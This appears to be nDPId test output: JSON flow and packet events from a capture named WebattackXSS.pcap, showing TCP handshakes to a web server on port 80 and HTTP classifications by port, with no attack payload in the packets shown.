-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7166,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347828369,"flow_last_seen":1499347828369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347828369,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7166,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1499347828369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347828369,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QFxAAD4GhXSsEAABwKgKMoFiAFAwDnAtAAAAAKACchALaQAAAgQFtAQCCAoBPDBxAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7167,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":2,"flow_last_seen":1499347828369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347828369,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgWKuqhlpMA5wLqAScSA+aQAAAgQFtAQCCAoD5gHlATwwcQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7168,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":3,"flow_last_seen":1499347828369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347828369,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QF1AAD4GhXusEAABwKgKMoFiAFAwDnAurqoZaoAQAOXdcAAAAQEICgE8MHED5gHl"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7179,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347829667,"flow_last_seen":1499347829667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347829667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7179,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1499347829667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347829667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lVZAAD4GMHqsEAABwKgKMoFwAFBnlqTjAAAAAKACchCd2AAAAgQFtAQCCAoBPDG1AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":2,"flow_last_seen":1499347829667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347829667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgXAvgGqdZ5ak5KAScSD9iQAAAgQFtAQCCAoD5gMqATwxtQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":3,"flow_last_seen":1499347829668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347829668,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lVdAAD4GMIGsEAABwKgKMoFwAFBnlqTkL4BqnoAQAOWckAAAAQEICgE8MbYD5gMq"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7200,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347832201,"flow_last_seen":1499347832201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347832201,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7200,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1499347832201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347832201,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Dq9AAD4GtyGsEAABwKgKMoGKAFARZDqAAAAAAKACchBb2gAAAgQFtAQCCAoBPDQvAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7201,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":2,"flow_last_seen":1499347832202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347832202,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgYqpulj1EWQ6gaAScSBQgAAAAgQFtAQCCAoD5gWjATw0LwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":3,"flow_last_seen":1499347832202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347832202,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DrBAAD4GtyisEAABwKgKMoGKAFARZDqBqbpY9oAQAOXvhwAAAQEICgE8NC8D5gWj"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347833462,"flow_last_seen":1499347833462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1499347833462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347833462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8H+JAAD4Gpe6sEAABwKgKMoGYAFAzOSqIAAAAAKACchBItAAAAgQFtAQCCAoBPDVqAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":2,"flow_last_seen":1499347833462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347833462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgZimBogRMzkqiaAScSAQtwAAAgQFtAQCCAoD5gbeATw1agEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":3,"flow_last_seen":1499347833462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347833462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0H+NAAD4GpfWsEAABwKgKMoGYAFAzOSqJpgaIEoAQAOWvvgAAAQEICgE8NWoD5gbe"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347705116,"flow_last_seen":1499347710811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347705116,"flow_last_seen":1499347710811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347706399,"flow_last_seen":1499347711812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347706399,"flow_last_seen":1499347711812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347709252,"flow_last_seen":1499347714812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347709252,"flow_last_seen":1499347714812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347713588,"flow_last_seen":1499347718814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347713588,"flow_last_seen":1499347718814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347836095,"flow_last_seen":1499347836095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347836095,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1499347836095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347836095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z2FAAD4GXm+sEAABwKgKMoGyAFBvhFCdAAAAAKACchDjpwAAAgQFtAQCCAoBPDf8AAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":2,"flow_last_seen":1499347836095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347836095,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgbKB84w4b4RQnqAScSDJAwAAAgQFtAQCCAoD5glxATw3\/AEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7232,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":3,"flow_last_seen":1499347836096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347836096,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z2JAAD4GXnasEAABwKgKMoGyAFBvhFCegfOMOYAQAOVoCgAAAQEICgE8N\/0D5glx"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7239,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347837373,"flow_last_seen":1499347837373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347837373,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7239,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1499347837373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347837373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zIRAAD4G+UusEAABwKgKMoHAAFDQoPW4AAAAAKACchDcIQAAAgQFtAQCCAoBPDk8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7240,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":2,"flow_last_seen":1499347837373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347837373,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgcDH48pN0KD1uaAScSA8OQAAAgQFtAQCCAoD5gqwATw5PAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7241,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":3,"flow_last_seen":1499347837374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347837374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zIVAAD4G+VKsEAABwKgKMoHAAFDQoPW5x+PKToAQAOXbQAAAAQEICgE8OTwD5gqw"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347838675,"flow_last_seen":1499347838675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347838675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1499347838675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347838675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8apJAAD4GWz6sEAABwKgKMoHOAFDGglATAAAAAKACchCKkgAAAgQFtAQCCAoBPDqBAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":2,"flow_last_seen":1499347838675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347838675,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgc48YB01xoJQFKAScSAiAAAAAgQFtAQCCAoD5gv2ATw6gQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":3,"flow_last_seen":1499347838676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347838676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0apNAAD4GW0WsEAABwKgKMoHOAFDGglAUPGAdNoAQAOXBBgAAAQEICgE8OoID5gv2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7269,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347841229,"flow_last_seen":1499347841229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347841229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7269,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1499347841229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347841229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86g5AAD4G28GsEAABwKgKMoHoAFBN49cOAAAAAKACchB5nQAAAgQFtAQCCAoBPD0AAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7270,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":2,"flow_last_seen":1499347841229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347841229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgejkRPOpTePXD6AScSCQMwAAAgQFtAQCCAoD5g50ATw9AAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7271,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":3,"flow_last_seen":1499347841230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347841230,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06g9AAD4G28isEAABwKgKMoHoAFBN49cP5ETzqoAQAOUvOwAAAQEICgE8PQAD5g50"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347842491,"flow_last_seen":1499347842491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347842491,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1499347842491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347842491,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lUdAAD4GMImsEAABwKgKMoH2AFCtqqt8AAAAAKACchBEHwAAAgQFtAQCCAoBPD47AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":2,"flow_last_seen":1499347842491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347842491,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgfYhjECLraqrfaAScSDPUAAAAgQFtAQCCAoD5g+wATw+OwEDAwc="} 